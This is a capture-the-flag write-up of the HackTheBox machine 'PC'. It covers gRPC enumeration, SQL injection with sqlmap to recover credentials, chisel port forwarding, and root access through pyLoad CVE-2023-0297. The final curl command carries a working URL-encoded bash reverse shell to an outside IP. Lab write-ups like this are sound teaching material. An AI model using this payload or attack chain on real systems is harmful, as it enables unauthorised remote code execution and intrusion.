HackTheBox — PC

ARZ101
4 min readOct 7, 2023

PC, an easy machine involved enumerating gRPC services, where a method vulnerable to SQLi, giving us the credentials for sau user, escalating privileges by port forwarding a login page on port 8000 which had pyLoad running vulnerable to CVE-2023–0297 which is a pre-authentication code execution, giving us the root shell.

NMAP

Nmap scan report for 10.129.19.240                     
Host is up (0.21s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91bf44edea1e3224301f532cea71e5ef (RSA)
| 256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_ 256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open unknown

PORT 50051

Connecting to this port through telnet or netcat, doesn't yield anything but ???

Researching what runs on port 50051 shows that, gRPC uses this port which is an open source remote procedure call framework by google

We can analyze the traffic through wireshark by sniffing packets on our interface (tun0) and changing protocol to HTTP/2

gRPC can be enumerated through grpcurl

grpcurl -plaintext 10.129.19.240:50051 list

This listed two services, let’s try listing the methods in SimpleApp

SimpleApp service has three methods which can be checked with describe argument

We can register and login with an account which in return provides an id

grpcurl -plaintext -d '{"username":"arz101" , "password":"12345"}' 10.129.19.240:50051 SimpleApp/RegisterUser 
grpcurl -plaintext -d '{"username":"arz101" , "password":"12345"}' 10.129.19.240:50051 SimpleApp/LoginUser

Now using getInfo will ask for a token

Foothold

If we go back to login method, we do use a token if we enable verbosity with -vv

grpcurl -vv -plaintext -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYXJ6MTAxIiwiZXhwIjoxNjg0NjkzODY1fQ.CMWWeEN92nUfwMh8_AUGBPjHsIC7oIRTVDBZEy2qDS8" 10.129.19.240:50051 SimpleApp/getInfo

This gives us an error Unexpected : bad argument type for built-in operation due to we haven’t specified the data, if we use describe to see what parameters the method accepts

It needs the ID which we get after logging in

grpcurl -vv -plaintext -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYXJ6MTAxIiwiZXhwIjoxNjg0NjkzODY1fQ.CMWWeEN92nUfwMh8_AUGBPjHsIC7oIRTVDBZEy2qDS8" -d '{"id": "842"}' 10.129.19.240:50051 SimpleApp/getInfo

But tampering/playing around with this was a little difficult, so I tried postman and grpcui which gives you GUI with which you can work with gRPC service and also intercept the requests easily

After identifying that it was using some filters for sqli, we can try running sqlmap which found injection on id parameter

With these credentials, we can login as sau user

Privilege Escalation

Having enumerated the SUIDs, the files which are owned sau none of them showed any path to escalation, checking the local ports, there was port 8000 open which redirects to a login page

Port forwarding with chisel

chisel server -p 3333 --reverse

chisel client 10.10.16.19:3333 R:localhost:8000

Now accessing the port on our browser we'll get a login page for pyLoad which is a download manager for python

Trying the default credentials like admin:admin and pyload:pyload didn't work, so searching for CVEs there was a pre-auth rce vulnerability (CVE-2023-0297)

Using the poc we'll get a shell as the root user

curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"%2Fbin%2Fbash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F10%2E10%2E16%2E19%2F2222%200%3E%261%27\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://localhost:8000/flash/addcrypted2'

References

--

--